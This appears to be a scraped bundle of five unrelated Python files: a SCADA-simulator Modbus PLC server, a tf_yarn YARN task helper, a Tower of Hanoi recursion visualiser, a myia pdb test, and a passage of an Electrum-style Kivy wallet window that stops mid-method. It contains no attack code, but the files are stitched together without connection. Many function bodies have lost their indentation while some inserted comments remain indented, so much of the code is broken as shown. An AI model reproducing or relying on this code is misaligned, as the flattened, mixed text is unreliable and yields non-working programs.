async_plc.py
|
#!/usr/bin/env python
# SCADA Simulator
#
# Copyright 2018 Carnegie Mellon University. All Rights Reserved.
#
# NO WARRANTY. THIS CARNEGIE MELLON UNIVERSITY AND SOFTWARE ENGINEERING INSTITUTE MATERIAL IS FURNISHED ON AN "AS-IS" BASIS. CARNEGIE MELLON UNIVERSITY MAKES NO WARRANTIES OF ANY KIND, EITHER EXPRESSED OR IMPLIED, AS TO ANY MATTER INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR PURPOSE OR MERCHANTABILITY, EXCLUSIVITY, OR RESULTS OBTAINED FROM USE OF THE MATERIAL. CARNEGIE MELLON UNIVERSITY DOES NOT MAKE ANY WARRANTY OF ANY KIND WITH RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT INFRINGEMENT.
#
# Released under a MIT (SEI)-style license, please see license.txt or contact permission@sei.cmu.edu for full terms.
#
# [DISTRIBUTION STATEMENT A] This material has been approved for public release and unlimited distribution. Please see Copyright notice for non-US Government use and distribution.
# This Software includes and/or makes use of the following Third-Party Software subject to its own license:
# 1. Packery (https://packery.metafizzy.co/license.html) Copyright 2018 metafizzy.
# 2. Bootstrap (https://getbootstrap.com/docs/4.0/about/license/) Copyright 2011-2018 Twitter, Inc. and Bootstrap Authors.
# 3. JIT/Spacetree (https://philogb.github.io/jit/demos.html) Copyright 2013 Sencha Labs.
# 4. html5shiv (https://github.com/aFarkas/html5shiv/blob/master/MIT%20and%20GPL2%20licenses.md) Copyright 2014 Alexander Farkas.
# 5. jquery (https://jquery.org/license/) Copyright 2018 jquery foundation.
# 6. CanvasJS (https://canvasjs.com/license/) Copyright 2018 fenopix.
# 7. Respond.js (https://github.com/scottjehl/Respond/blob/master/LICENSE-MIT) Copyright 2012 Scott Jehl.
# 8. Datatables (https://datatables.net/license/) Copyright 2007 SpryMedia.
# 9. jquery-bridget (https://github.com/desandro/jquery-bridget) Copyright 2018 David DeSandro.
# 10. Draggabilly (https://draggabilly.desandro.com/) Copyright 2018 David DeSandro.
# 11. Business Casual Bootstrap Theme (https://startbootstrap.com/template-overviews/business-casual/) Copyright 2013 Blackrock Digital LLC.
# 12. Glyphicons Fonts (https://www.glyphicons.com/license/) Copyright 2010 - 2018 GLYPHICONS.
# 13. Bootstrap Toggle (http://www.bootstraptoggle.com/) Copyright 2011-2014 Min Hur, The New York Times.
# DM18-1351
#
'''
Asynchronous PyModbus Server with Client Functionality
Used for SCADASim 2.0
'''
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from pymodbus.server.asynchronous import StartSerialServer
from pymodbus.server.asynchronous import StartTcpServer
from pymodbus.server.asynchronous import StartUdpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer, ModbusBinaryFramer
# --------------------------------------------------------------------------- #
# import the other libraries we need
# --------------------------------------------------------------------------- #
from datastore import *
from helper import *
from time import *
from threading import Thread
import logging, yaml
import sys, os, argparse
'''
@brief reads from backup, initializes the datastore, starts the backup thread and the register behavior threads, then starts the server
'''
def run_updating_server(config_list, backup_filename, log):
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
# Run datastore_backup_on_start to use the most recent values of the datablocks, as the layout in the master config will only reflect initial values
# If this is the first time this is used, the backup file will match up with what is laid out in the master config (due to master.py)
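    # For illustration, a backup file of the shape this code expects would look
    # roughly like the (hypothetical) YAML below -- one block per register type,
    # each with a start address and a list of current values:
    #
    #   di: {start_addr: 1, values: [0, 0, 1]}
    #   co: {start_addr: 1, values: [1, 0, 0]}
    #   hr: {start_addr: 1, values: [17, 42, 0]}
    #   ir: {start_addr: 1, values: [3, 3, 3]}
    #
    # The exact layout is defined by master.py/datastore.py; this sketch only
    # mirrors the keys accessed below.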
datastore_config = datastore_backup_on_start(backup_filename)
if datastore_config == -1:
print("Issue with backup file - either not created or empty. Exiting program.")
sys.exit()
store = ModbusSlaveContext(
di=ModbusSequentialDataBlock(datastore_config['di']['start_addr'], datastore_config['di']['values']),
co=ModbusSequentialDataBlock(datastore_config['co']['start_addr'], datastore_config['co']['values']),
hr=ModbusSequentialDataBlock(datastore_config['hr']['start_addr'], datastore_config['hr']['values']),
ir=ModbusSequentialDataBlock(datastore_config['ir']['start_addr'], datastore_config['ir']['values']))
    # We could have multiple slaves, each with their own addressing; since every
    # async_plc.py handles a single PLC device, that is not necessary here.
context = ModbusServerContext(slaves=store, single=True)
# setup a thread with target as datastore_backup_to_yaml to start here, before other threads
# this will continuously read from the context to write to a backup yaml file
backup_thread = Thread(target=datastore_backup_to_yaml, args=(context, backup_filename))
backup_thread.daemon = True
backup_thread.start()
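    # A minimal sketch of the kind of loop datastore_backup_to_yaml (defined in
    # datastore.py, not shown here) is described as running -- periodically read
    # the live context and dump it to the backup YAML. Illustrative only; the
    # real helper may differ, and read_context below is a hypothetical name:
    #
    #   def backup_loop(context, backup_filename, interval=5):
    #       while True:
    #           snapshot = read_context(context)      # hypothetical helper
    #           with open(backup_filename, 'w') as f:
    #               yaml.dump(snapshot, f)
    #           sleep(interval)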
    # Start register behaviors: updating_writer is kicked off and will spawn a
    # thread for every holding register based on the config.
thread = Thread(target=updating_writer, args=(context, config_list, time, log, backup_filename))
thread.daemon = True
thread.start()
# Starting the server
server_config = config_list['SERVER']
    framer = configure_server_framer(server_config)
    # The UDP/TCP branches below reference `identity`; build a basic device
    # identification here so it is defined before the server starts.
    identity = ModbusDeviceIdentification()
if server_config['type'] == 'serial':
StartSerialServer(context, port=server_config['port'], framer=framer)
elif server_config['type'] == 'udp':
StartUdpServer(context, identity=identity, address=(server_config['address'], int(server_config['port'])))
elif server_config['type'] == 'tcp':
if server_config['framer'] == 'RTU':
StartTcpServer(context, identity=identity, address=(server_config['address'], int(server_config['port'])), framer=framer)
else:
StartTcpServer(context, address=(server_config['address'], int(server_config['port'])))
'''
@brief parse args, handle master config, setup logging, then call run_updating_server
'''
def main():
# --- BEGIN argparse handling ---
parser = argparse.ArgumentParser(description = "Main program for PLC device based off PyModbus")
parser.add_argument("--n", "--num_of_PLC", help = "The number of the PLC device")
parser.add_argument("--c", "--config_filename", help = "Name of the master config file")
args = parser.parse_args()
if args.n is None or args.c is None:
print("Need to run async_plc.py with --n and --c arguments. Run 'python async_plc.py --h' for help")
return
print( args )
num_of_PLC = args.n
master_config_filename = args.c
backup_filename = '/usr/local/bin/scadasim_pymodbus_plc/backups/backup_' + args.n + '.yaml'
# --- END argparse handling ---
stream = open(master_config_filename, 'r')
config_list = yaml.safe_load(stream)
stream.close()
# Only get the current PLC's configuration dictionary
config_list = config_list["PLC " + num_of_PLC]
# --- BEGIN LOGGING SETUP ---
FORMAT = config_list['LOGGING']['format']
    # Configure logging depending on whether output goes to a file or STDOUT,
    # and on whether a format string is supplied.
if config_list['LOGGING']['file'] == 'STDOUT':
if FORMAT == 'NONE':
logging.basicConfig()
else:
logging.basicConfig(format=FORMAT)
else:
if FORMAT == 'NONE':
logging.basicConfig(filename=config_list['LOGGING']['file'])
else:
logging.basicConfig(format=FORMAT, filename=config_list['LOGGING']['file'])
log = logging.getLogger()
configure_logging_level(config_list['LOGGING']['logging_level'], log)
# --- END LOGGING SETUP ---
run_updating_server(config_list, backup_filename, log)
if __name__ == "__main__":
main()
|
_task_commons.py
|
import json
import logging
import os
import re
import sys
from typing import List, Tuple, Dict, Optional, NamedTuple, Union
import cloudpickle
import skein
import tensorflow as tf
from tf_yarn import event, cluster, Experiment, constants, KerasExperiment
from tf_yarn._internal import MonitoredThread, iter_tasks
_logger = logging.getLogger(__name__)
def _log_sys_info() -> None:
_logger.info(f"Python {sys.version}")
_logger.info(f"Skein {skein.__version__}")
_logger.info(f"TensorFlow {tf.version.GIT_VERSION} {tf.version.VERSION}")
def _setup_container_logs(client):
task = cluster.get_task()
event.broadcast_container_start_time(client, task)
container = next(c for c in client.get_containers()
if c.yarn_container_id == os.environ["CONTAINER_ID"])
logs = container.yarn_container_logs
if logs is not None and not logs.startswith("http://"):
logs = "http://" + logs
event.logs_event(client, task, logs)
def _prepare_container(
host_port: Tuple[str, int]
) -> Tuple[skein.ApplicationClient, Dict[str, List[str]], List[str]]:
"""Keep socket open while preparing container """
client = skein.ApplicationClient.from_current()
_setup_container_logs(client)
cluster_tasks = _get_cluster_tasks(client)
cluster_spec = cluster.start_cluster(host_port, client, cluster_tasks)
return client, cluster_spec, cluster_tasks
def _get_cluster_tasks(
client: skein.ApplicationClient
) -> List[str]:
return list(iter_tasks(json.loads(client.kv.wait(constants.KV_CLUSTER_INSTANCES).decode())))
def _get_experiment(
client: skein.ApplicationClient
) -> NamedTuple:
try:
experiment = cloudpickle.loads(client.kv.wait(constants.KV_EXPERIMENT_FN))()
except Exception as e:
task = cluster.get_task()
event.start_event(client, task)
event.stop_event(client, task, e)
raise
return experiment
def _gen_monitored_train_and_evaluate(client: skein.ApplicationClient):
task = cluster.get_task()
def train_and_evaluate(
            estimator: tf.estimator.Estimator,
train_spec: tf.estimator.TrainSpec,
eval_spec: tf.estimator.EvalSpec):
event.broadcast_train_eval_start_timer(client, task)
tf.estimator.train_and_evaluate(
estimator,
train_spec,
eval_spec
)
event.broadcast_train_eval_stop_timer(client, task)
return train_and_evaluate
def _execute_dispatched_function(
client: skein.ApplicationClient,
experiment: Union[Experiment, KerasExperiment]
) -> MonitoredThread:
task_type, task_id = cluster.get_task_description()
_logger.info(f"Starting execution {task_type}:{task_id}")
if isinstance(experiment, Experiment):
thread = MonitoredThread(
name=f"{task_type}:{task_id}",
target=_gen_monitored_train_and_evaluate(client),
args=tuple(experiment),
daemon=True)
elif isinstance(experiment, KerasExperiment):
raise ValueError("KerasExperiment using parameter strategy is unsupported")
else:
raise ValueError("experiment must be an Experiment or a KerasExperiment")
thread.start()
task = cluster.get_task()
event.start_event(client, task)
return thread
def matches_device_filters(task: str, device_filters: List[str]):
task_type, task_id = task.split(":", 1)
for device_filter in device_filters:
[(filter_type, filter_id)] = re.findall(
r"^/job:([a-z]+)(?:/task:(\d+))?$",
# Remove once https://github.com/tensorflow/tensorflow/pull/22566 is released
device_filter.replace("master", "chief"))
if (filter_type == task_type and
(not filter_id or filter_id == task_id)):
return True
return not device_filters
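# Illustrative examples (not part of the original module) of how the matching
# above behaves, assuming standard TF device-filter strings:
#
#   matches_device_filters("worker:0", ["/job:worker/task:0"])  # True
#   matches_device_filters("worker:1", ["/job:worker/task:0"])  # False
#   matches_device_filters("ps:0", ["/job:worker"])             # False
#   matches_device_filters("ps:0", [])                          # True (no filters)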
def wait_for_connected_tasks(client, all_tasks, device_filters, message='stop'):
for task in all_tasks:
if matches_device_filters(task, device_filters):
event.wait(client, f"{task}/{message}")
def _shutdown_container(
client: skein.ApplicationClient,
cluster_tasks: List[str],
session_config: tf.compat.v1.ConfigProto,
thread: Optional[MonitoredThread]
) -> None:
# Wait for all tasks connected to this one. The set of tasks to
# wait for contains all tasks in the cluster, or the ones
# matching ``device_filters`` if set. The implementation assumes
    # that ``device_filters`` are symmetric.
exception = thread.exception if thread is not None and isinstance(thread, MonitoredThread) \
else None
task = cluster.get_task()
event.stop_event(client, task, exception)
wait_for_connected_tasks(
client,
cluster_tasks,
getattr(session_config, "device_filters", []))
event.broadcast_container_stop_time(client, task)
if exception is not None:
raise exception from None
|
recursive_solver.py
|
from tree_viewer import TreeViewer
import Tkinter as tk
import threading
import time
NUM_DISKS = 3
Pole1 = '1'
Pole2 = '2'
Pole3 = '3'
BEGIN_QUEUE = [1,5]
MOVES = {}
MOVES[Pole1, Pole2] = [5,1,4,3,4,1,5,2,]
MOVES[Pole2, Pole1] = [3,5,1,4,2,4,1,5,]
MOVES[Pole1, Pole3] = [5,1,4,3,4,1,1,5,2,5,1,4,]
MOVES[Pole3, Pole1] = [4,1,5,3,5,1,1,4,2,4,1,5,]
MOVES[Pole3, Pole2] = [3,4,1,5,2,5,1,4,]
MOVES[Pole2, Pole3] = [4,1,5,3,5,1,4,2,]
END_QUEUE = [0,0,0,5,5,1]
class RecursiveSolver:
def __init__(self, viewer):
self.num_disks = NUM_DISKS
self.viewer = viewer
def move(self, frm, to):
return MOVES[frm, to]
def dohanoi(self, n, to, frm, using):
if n == 0: return []
level = self.num_disks - n
        prefix = '\t' * level
self.viewer.display_text(prefix + "At level {0} goal is to move {1} disks from pole {2} to pole {3}".format(level, n, frm, to))
self.viewer.user_pause('')
if n > 1:
self.viewer.display_text(prefix + "Decomposing the problem:")
self.viewer.display_text(prefix + "Move {0} disks from pole {1} to pole {2}".format(n-1, frm, using))
self.viewer.display_text(prefix + "Then move remaining disk from pole {0} to pole {1}".format(frm, to))
self.viewer.display_text(prefix + "Then move {0} disks from pole {1} to pole {2}".format(n-1, using, to))
subgoals = ['Move %s disks from %s to %s' % (n-1, frm, using),
'Move disk from %s to %s' % (frm, to),
'Move %s disks from %s to %s' % (n-1, using, to)]
self.viewer.add_item_viewer("Subgoals", subgoals, -1, [])
self.viewer.user_pause('')
self.viewer.set_active_index(0, level + 1)
self.viewer.display_text(prefix + "Recursing on first subgoal...")
self.viewer.user_pause('')
actions1 = self.dohanoi(n-1, using, frm, to)
self.viewer.add_completed_index(0, level + 1)
self.viewer.set_active_index(1, level + 1)
self.viewer.display_text(prefix + "Handling second subgoal...")
self.viewer.display_text(prefix + "Adding action: Move remaining disk from {0} to {1}".format(frm, to))
self.viewer.user_pause('')
actions2 = self.move(frm, to)
self.viewer.add_completed_index(1, level + 1)
self.viewer.set_active_index(2, level + 1)
self.viewer.display_text(prefix + "Recursing on third subgoal...")
self.viewer.user_pause('')
actions3 = self.dohanoi(n-1, to, using, frm)
self.viewer.add_completed_index(2, level + 1)
plan = actions1 + actions2 + actions3
#self.display_text(prefix + "Back at level {0}, the plan is [{1}]".format(level, ', '.join([str(x) for x in plan])))
self.viewer.display_text(prefix + "Subgoals are completed...")
self.viewer.user_pause('')
self.viewer.remove_last_item_viewer(level + 1)
return actions1 + actions2 + actions3
else:
self.viewer.display_text(prefix + "Entering base case...".format(frm, to))
self.viewer.display_text(prefix + "Adding action: Move single disk from {0} to {1}".format(frm, to))
actions2 = self.move(frm, to)
self.viewer.user_pause('')
return actions2
def solve(self):
time.sleep(0.1)
for a in self.queue_init():
continue
def queue_init(self):
self.viewer.add_item_viewer("Goal", ['Move %s disks from %s to %s' % (self.num_disks, Pole1, Pole3)], -1, [])
self.viewer.display_text('Starting to Solve!')
self.viewer.user_pause('')
self.viewer.set_active_index(0, 0)
actions = self.dohanoi(self.num_disks, Pole3, Pole1, Pole2)
self.viewer.add_completed_index(0, 0)
self.viewer.display_text('Problem Solved! Please click Execute Plan or close the window to continue!')
self.viewer.user_pause('')
return BEGIN_QUEUE + actions + END_QUEUE
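    # For reference, the decomposition animated above is the classic recursive
    # Tower of Hanoi. A minimal, viewer-free sketch of the same algorithm
    # (illustrative only, not used by this class):
    #
    #   def hanoi(n, frm, to, using):
    #       if n == 0:
    #           return []
    #       return (hanoi(n - 1, frm, using, to)
    #               + [(frm, to)]
    #               + hanoi(n - 1, using, to, frm))
    #
    #   hanoi(3, '1', '3', '2')  # 7 moves: [('1','3'), ('1','2'), ('3','2'), ...]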
def main():
root = tk.Tk()
root.title('Problem Decomposition')
viewer = TreeViewer(root)
solver = RecursiveSolver(viewer)
worker = threading.Thread(target=solver.solve)
worker.daemon = True
worker.start()
tk.mainloop()
worker.join()
if __name__ == "__main__":
main()
|
test_python_pdb.py
|
"""Test Python backend with option pdb=True.
It seems pytest-cov does not work well if PDB is imported during pytest runs.
To deal with it, code with PDB is executed in a separate process. This seems
enough to make coverage work again.
"""
import multiprocessing
import os
from myia import myia
def run_pdb(return_cell, *args):
# Myia-compiled function result will be saved in return_cell (shared list).
@myia(backend="python", backend_options={"debug": True, "pdb": True})
def f(a, b, c, d):
x = a ** b
y = x * c
z = x / d
return y + z + x
wd = os.getcwd()
# Change working directory to use local .pdbrc
os.chdir(os.path.dirname(__file__))
return_cell.append(f(*args))
# Back to previous working directory
os.chdir(wd)
def test_pdb():
manager = multiprocessing.Manager()
return_cell = manager.list()
p = multiprocessing.Process(
        target=run_pdb, args=(return_cell, 1.0, 2.0, 3.0, 4.0)
)
p.start()
p.join()
assert return_cell[0] == 4.25
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain, format_fee_satoshis
from electrum.util import PR_UNPAID, PR_PAID, PR_EXPIRED, PR_FAILED, PR_INFLIGHT
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register a widget cache to keep memory usage down; a timeout of 0 means
# entries are cached forever.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic inside
# markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.wallet import Abstract_Wallet
from electrum.plugin import Plugins
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.storage.put('use_change', self.use_change)
self.wallet.storage.write()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'tachacoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.set_status(status)
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key, status):
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.set_status(status)
if status == PR_PAID:
self.show_info(_('Payment was sent'))
self._trigger_update_history()
elif status == PR_FAILED:
self.show_info(_('Payment failed'))
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Orientation of the device screen.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.request_popup = None
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('tachacoin:'):
self.set_URI(data)
return
if data.startswith('ln'):
self.set_ln_invoice(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
status = request['status']
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key)
self.request_popup.set_status(request['status'])
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
status = invoice['status']
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.set_status(status)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
